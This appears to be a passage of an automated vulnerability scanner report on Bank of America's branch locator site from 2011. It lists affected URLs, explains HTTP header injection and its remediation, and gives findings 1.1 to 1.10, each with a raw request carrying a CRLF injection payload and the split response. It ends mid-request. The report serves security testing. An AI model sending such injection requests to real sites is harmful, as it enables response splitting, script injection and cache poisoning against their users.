2.12. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/

2.13. http://locators.bankofamerica.com/locator/locator/108__South__McGee_67333_CANEY_KS/bank_branch_locations/action=route

2.14. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/

2.15. http://locators.bankofamerica.com/locator/locator/10__Juliustown__Rd_08015_BROWNS__MILLS_NJ/bank_branch_locations/action=route

2.16. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/

2.17. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route

2.18. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/

2.19. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route

2.20. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/

2.21. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

2.22. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/

2.23. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route

2.24. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/

2.25. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route

2.26. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/

2.27. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

2.28. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/

2.29. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route

2.30. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/

2.31. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route

2.32. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/

2.33. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route

2.34. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/

2.35. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route

2.36. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/

2.37. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route

2.38. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/

2.39. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route

2.40. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/

2.41. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route

2.42. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/

2.43. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route

2.44. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/

2.45. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route

2.46. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/

2.47. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route

2.48. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/

2.49. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route

2.50. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/

2.51. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route

2.52. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/

2.53. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route

2.54. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/

2.55. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route

2.56. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/

2.57. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route

2.58. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/

2.59. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route

2.60. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/

2.61. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route

2.62. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/

2.63. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/action=route

2.64. http://locators.bankofamerica.com/locator/locator/BrowseByCityAction.do

2.65. http://locators.bankofamerica.com/locator/locator/BrowseByCityLetterAction.do

2.66. http://locators.bankofamerica.com/locator/locator/BrowseByPostalCodeAction.do

2.67. http://locators.bankofamerica.com/locator/locator/BrowseByStateAction.do

2.68. http://locators.bankofamerica.com/locator/locator/FullPageSearchAction.do

2.69. http://locators.bankofamerica.com/locator/locator/InternationalLocAction.do

2.70. http://locators.bankofamerica.com/locator/locator/LocatorAction.do

2.71. http://locators.bankofamerica.com/locator/locator/QuickHelp.do

2.72. http://locators.bankofamerica.com/locator/locator/ResultsDisplayAction.do

2.73. http://locators.bankofamerica.com/locator/locator/SearchAction.do

2.74. http://locators.bankofamerica.com/locator/locator/SessionTimeout.do

2.75. http://locators.bankofamerica.com/locator/locator/bbcc3

2.76. http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp

3. Cross-domain Referer leakage

3.1. http://locators.bankofamerica.com/locator/locator/LocatorAction.do

3.2. http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp

4. Content type incorrectly stated

4.1. http://locators.bankofamerica.com/locator/locator/images/searchInputGlow_home.gif

4.2. http://locators.bankofamerica.com/locator/locator/jsp/keepAlive.jsp

4.3. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/bg.gif

4.4. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/bgo.gif


1. HTTP header injection  next
There are 215 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/ [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload da0e0%0d%0a547c1495d31 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/da0e0%0d%0a547c1495d31/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7894BCA611FAAB1840DF2CF8073E57E8.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; cmTPSet=Y; state=MA; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; searchPageState=%7B%22footprintMapAction%22%3A%22footprintMapAction%20('tx'%2C'o')%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(true%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'BC-8203'%2CLigeoAPI.getSearchResultsMap()%2Cfalse%2Cnull)%3B%5C%22%2C1000)%3B%22%2C%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22hours_24%22%3A%22document.getElementById('hours_24').checked%20%3D%20true%3B%22%2C%22atm_locations%22%3A%22document.getElementById('atm_locations').checked%20%3D%20true%3B%22%2C%22inside_lobby%22%3A%22document.getElementById('inside_lobby').checked%20%3D%20true%3B%22%2C%22drive_up_atm%22%3A%22document.getElementById('drive_up_atm').checked%20%3D%20true%3B%22%2C%22accepts_deposits%22%3A%22document.getElementById('accepts_deposits').checked%20%3D%20true%3B%22%2C%22commercial_deposits%22%3A%22document.getElementById('commercial_deposits').checked%20%3D%20true%3B%22%2C%22bc_locations%22%3A%22document.getElementById('bc_locations').checked%20%3D%20true%3B%22%2C%22open_saturdays%22%3A%22document.getElementById('open_saturdays').checked%20%3D%20true%3B%22%2C%22accepts_appointments%22%3A%22document.getElementById('accepts_appointments').checked%20%3D%20true%3B%22%2C%22night_deposits%22%3A%22document.getElementById('night_deposits').checked%20%3D%20true%3B%22%2C%22drive_up_bc%22%3A%22document.getElementById('drive_up_bc').checked%20%3D%20true%3B%22%2C%22change_orders%22%3A%22document.getElementById('change_orders').checked%20%3D%20true%3B%22%7D; profilePageState=; cmRS=&t1=1309349734538&t2=1309349737587&t3=1309349749335&t4=1309349724463&lti=1309349749335&ln=&hr=http%3A//locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//locators.bankofamerica.com/locator/locator/LocatorAction.do&rf=http%3A//burp/show/39

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=F33D60D498913160FB4B29A788629066.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/da0e0
547c1495d31/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.2. http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6f2bf%0d%0ab5c94f43df1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/6f2bf%0d%0ab5c94f43df1/ HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7894BCA611FAAB1840DF2CF8073E57E8.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; cmTPSet=Y; state=MA; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; searchPageState=%7B%22footprintMapAction%22%3A%22footprintMapAction%20('tx'%2C'o')%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(true%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'BC-8203'%2CLigeoAPI.getSearchResultsMap()%2Cfalse%2Cnull)%3B%5C%22%2C1000)%3B%22%2C%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22hours_24%22%3A%22document.getElementById('hours_24').checked%20%3D%20true%3B%22%2C%22atm_locations%22%3A%22document.getElementById('atm_locations').checked%20%3D%20true%3B%22%2C%22inside_lobby%22%3A%22document.getElementById('inside_lobby').checked%20%3D%20true%3B%22%2C%22drive_up_atm%22%3A%22document.getElementById('drive_up_atm').checked%20%3D%20true%3B%22%2C%22accepts_deposits%22%3A%22document.getElementById('accepts_deposits').checked%20%3D%20true%3B%22%2C%22commercial_deposits%22%3A%22document.getElementById('commercial_deposits').checked%20%3D%20true%3B%22%2C%22bc_locations%22%3A%22document.getElementById('bc_locations').checked%20%3D%20true%3B%22%2C%22open_saturdays%22%3A%22document.getElementById('open_saturdays').checked%20%3D%20true%3B%22%2C%22accepts_appointments%22%3A%22document.getElementById('accepts_appointments').checked%20%3D%20true%3B%22%2C%22night_deposits%22%3A%22document.getElementById('night_deposits').checked%20%3D%20true%3B%22%2C%22drive_up_bc%22%3A%22document.getElementById('drive_up_bc').checked%20%3D%20true%3B%22%2C%22change_orders%22%3A%22document.getElementById('change_orders').checked%20%3D%20true%3B%22%7D; profilePageState=; cmRS=&t1=1309349734538&t2=1309349737587&t3=1309349749335&t4=1309349724463&lti=1309349749335&ln=&hr=http%3A//locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//locators.bankofamerica.com/locator/locator/LocatorAction.do&rf=http%3A//burp/show/39

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=131A70C0B93891F1CCE850892A407F74.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/6f2bf
b5c94f43df1/?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.3. http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6cebe%0d%0a1fff56c6031 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/6cebe%0d%0a1fff56c6031/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=4E2D3CB4705B318DD39EC8DCAB58A85A.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/6cebe
1fff56c6031/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.4. http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5b591%0d%0a79aac9d2b02 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/5b591%0d%0a79aac9d2b02/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=CC23AA43D378AD31F8D0299228C43A71.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/5b591
79aac9d2b02/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.5. http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 3ea2b%0d%0a9f221b8d28b was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/3ea2b%0d%0a9f221b8d28b=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:46 GMT
Server: Apache
Set-Cookie: JSESSIONID=235F80B761C63B3C907BC35B9C74C052.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/100__Ryders__Lane_08850_MILLTOWN_NJ/bank_branch_locations/3ea2b
9f221b8d28b=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.6. http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6afd3%0d%0ac1353bfd23b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/6afd3%0d%0ac1353bfd23b/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=B2092A62DC22751DF0FAB221D0C8241E.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/6afd3
c1353bfd23b/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.7. http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2f583%0d%0a7eda9bb7e11 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/2f583%0d%0a7eda9bb7e11/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:40 GMT
Server: Apache
Set-Cookie: JSESSIONID=BCCA6AAA88B290CD1A16EF580E4FCDD2.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/2f583
7eda9bb7e11/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.8. http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5c8da%0d%0a49a4ba5da5b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/5c8da%0d%0a49a4ba5da5b/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=EC1933DFD9AF298EC2F466154FAA13FA.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/5c8da
49a4ba5da5b/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.9. http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 88c90%0d%0ad61b7cebf4e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/88c90%0d%0ad61b7cebf4e/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:25 GMT
Server: Apache
Set-Cookie: JSESSIONID=0FAB9184306907B666296BF8E8604707.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/88c90
d61b7cebf4e/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.10. http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 3c1fd%0d%0ae44b71fce6c was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/3c1fd%0d%0ae44b71fce6c=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
